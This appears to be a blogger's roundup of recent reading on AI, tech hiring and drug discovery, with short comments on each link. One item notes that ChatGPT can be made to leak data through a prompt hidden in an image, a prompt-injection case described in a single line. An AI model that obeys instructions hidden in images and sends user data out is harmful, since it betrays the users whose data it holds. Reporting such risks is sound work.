Here are some things that I read over the last few weeks that I found interesting, or that I learned something from.
Benedict Evan’s latest newsletter: https://newsletters.feedbinusercontent.com/de8/de8e11d8b69e568a52963c89d86e8b3d3ed837c9.html](https://newsletters.feedbinusercontent.com/de8/de8e11d8b69e568a52963c89d86e8b3d3ed837c9.html) This newsletter is always worth reading. From this specific one: Key points:
- Managing internet scale is hard, particularly around moderation. We often think in terms of use cases that we know and understand, but web scale introduces new dynamics. In a way, scholarly publishing is a web scale enterprise, but one that is not centrally controlled.
- Fear of AI apocalypse should recede in 2024. That’s my own position too, I’m probably more of an accelerationist, certainly not a doomster.
- Really novel problems and opportunities around LLMs are starting to emerge, beyond just coding and marketing.
On that last point, this post talks about a significant new collaboration between a DeepMind spinoff and Pharma, which could be worth multi-billions, basically to accelerate drug discovery. https://techcrunch.com/2024/01/07/isomorphic-inks-deals-with-eli-lilly-and-novartis-for-drug-discovery/](https://techcrunch.com/2024/01/07/isomorphic-inks-deals-with-eli-lilly-and-novartis-for-drug-discovery/)
Function calling significantly increases GPT performance, a detailed guide is given here. This is not something that most folk who prompt do, it could become a critical skill in 2024, or could be subsumed into some product layer. https://minimaxir.com/2023/12/chatgpt-structured-data/](https://minimaxir.com/2023/12/chatgpt-structured-data/)
GPT can have data exfiltrated via a hidden prompt in an image. OpenAI is starting to look at how to tackle this. The point is more that this kind of data risk is real, rather than that OpenAI is doing one specific thing about it. https://simonwillison.net/2023/Dec/21/openai-begins-tackling-chatgpt-data-leak-vulnerability/#atom-everything](https://simonwillison.net/2023/Dec/21/openai-begins-tackling-chatgpt-data-leak-vulnerability/#atom-everything)
Hiring slowdown in tech in 2023 in the US (https://www.techmeme.com/240106/p3#a240106p3). On the one hand, the slowdown in new engineers is remarkable. On the other hand, given the large unwinding of roles from big tech in the US over the last two years, it’s almost surprising that this number has not gone into reverse. On the flip side, high skilled visa numbers in the US jumped up by about 30% - https://marginalrevolution.com/marginalrevolution/2023/12/u-s-high-skilled-immigration.html](https://marginalrevolution.com/marginalrevolution/2023/12/u-s-high-skilled-immigration.html)
One downside of LLMs at the moment, they make it easier to create realistic-looking crap, and things like bug bounty programs are suffering as a result. https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/](https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/)
Quick thought of the week: Given LLMs are vector spaces, and vector spaces allow any kind of product to be created within the vector space:
- Could any set of combinations of products be mapped into a density space, to determine whether certain kinds of combinations are more or less likely, and if so, could you invert the vector space for some level of usefulness?
- Discovery in science often comes from combinations of existing knowledge, if we can map abstract data from a particular domain into a vector space, does this become an engine for prospecting potential new avenues of knowledge, and moreover is this opening up a new pillar of the scientific method?
- A mathematical construct does not need to be tied to the constraints of the world, so any new proto-knowledge that might be created with this method still needs to be grounded by a verification step of some kind. What is going to be the balance between mining for new potential areas of knowledge, vs the effort involved in verification, rather than verifying first, and exploring from verified points of our knowledge space.